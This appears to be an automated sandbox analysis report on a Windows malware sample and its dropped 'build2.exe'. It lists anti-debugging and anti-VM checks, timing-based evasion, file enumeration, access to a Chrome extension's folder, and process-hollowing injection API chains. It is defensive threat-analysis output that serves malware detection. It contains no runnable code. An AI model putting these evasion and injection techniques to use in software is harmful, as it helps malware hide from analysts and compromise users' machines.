                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmp3BC7.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-38466
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe TID: 7712Thread sleep count: 147 > 30Jump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe TID: 3272Thread sleep time: -700000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00416190 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004162C2h5_2_00416190
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA0160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00B9FB98
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EF730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002EF730
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002F0160
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EFB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_002EFB98
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00B9FB98
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00411A10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00411A10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C260 wsprintfA,FindFirstFileA,memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,strtok_s,strtok_s,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,5_2_0041C260
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F200 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040F200
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041D400 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0041D400
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00401600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00401600
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F8B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040F8B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CBA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_0041CBA0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040EDB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040EDB0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CFF0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,5_2_0041CFF0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C6B0 strtok_s,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,strtok_s,5_2_0041C6B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00416390 GetSystemInfo,wsprintfA,5_2_00416390
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeThread delayed: delay time: 700000Jump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1964059051.0000000003AD2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1967093428.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1964059051.0000000003AD2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000003.1662790576.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000003.1658762924.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: build2.exe, 00000005.00000002.2906708317.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.00000000008C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.00000000009DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: build2.exe, 00000005.00000003.1761763513.0000000000702000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD-j;
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSy
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                Source: build2.exe, 00000005.00000002.2906708317.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareJ
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeAPI call chain: ExitProcess graph end nodegraph_0-38468
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B91193 rdtsc 0_2_00B91193
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB4168 _memset,IsDebuggerPresent,0_2_00BB4168
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BBA57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BBA57A
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00361920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00361920
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA2220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00BA2220
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B0042 push dword ptr fs:[00000030h]4_2_005B0042
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005CF270 mov eax, dword ptr fs:[00000030h]4_2_005CF270
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B1D50 mov eax, dword ptr fs:[00000030h]4_2_005B1D50
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B1D60 mov eax, dword ptr fs:[00000030h]4_2_005B1D60
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B1D30 mov eax, dword ptr fs:[00000030h]4_2_005B1D30
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00633CD3 push dword ptr fs:[00000030h]4_2_00633CD3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004013C0 mov eax, dword ptr fs:[00000030h]5_2_004013C0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00401390 mov eax, dword ptr fs:[00000030h]5_2_00401390
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004013B0 mov eax, dword ptr fs:[00000030h]5_2_004013B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041E8D0 mov eax, dword ptr fs:[00000030h]5_2_0041E8D0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB78D5 GetProcessHeap,0_2_00BB78D5
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BC29BB SetUnhandledExceptionFilter,0_2_00BC29BB
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BC29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC29EC
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003129BB SetUnhandledExceptionFilter,2_2_003129BB
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003129EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003129EC
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BC29BB SetUnhandledExceptionFilter,3_2_00BC29BB
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BC29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00BC29EC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_004019E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_004019E0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00404A2D SetUnhandledExceptionFilter,4_2_00404A2D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0040FBF5 __NMSG_WRITE,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040FBF5
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00402D04 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00402D04
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042B35A SetUnhandledExceptionFilter,5_2_0042B35A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042064E memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0042064E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00426C10 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00426C10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,5_2_61EAF900
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,5_2_61EAF8FC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,4_2_005B0110
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeMemory written: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe base: 400000 value starts with: 4D5AJump to behavior
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00417C00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,5_2_00417C00
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" Jump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B91000 cpuid 0_2_00B91000
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00BD0116
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_00BC8178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00BC82A2
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_00BC834F
